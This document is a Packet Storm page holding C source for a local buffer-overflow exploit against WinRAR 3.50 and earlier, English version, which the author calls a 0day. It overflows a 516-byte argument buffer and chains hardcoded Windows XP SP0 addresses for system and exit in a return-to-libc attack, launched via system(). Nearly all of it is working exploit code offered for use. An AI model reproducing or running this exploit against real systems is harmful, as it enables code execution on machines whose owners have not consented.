Local exploit for winrar versions less than or equal to 3.50 ENG version.
72532d2181fcd53d15f1e8bd9f2d67844fe4b60830d28411c6b8cc7676e69520/*
local exploit for winrar <= 3.50 ENG version
bug is 0day :)
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ( int argc, char *argv[] )
{
long sys_addr = 0x77C18044; // winxp sp0 targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
char buf[3000];
char cmd[3000];
if ( argc < 2 )
{
printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
exit(0);
}
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 516);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
sprintf(cmd, "%s %s", argv[1], buf);
system(cmd);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed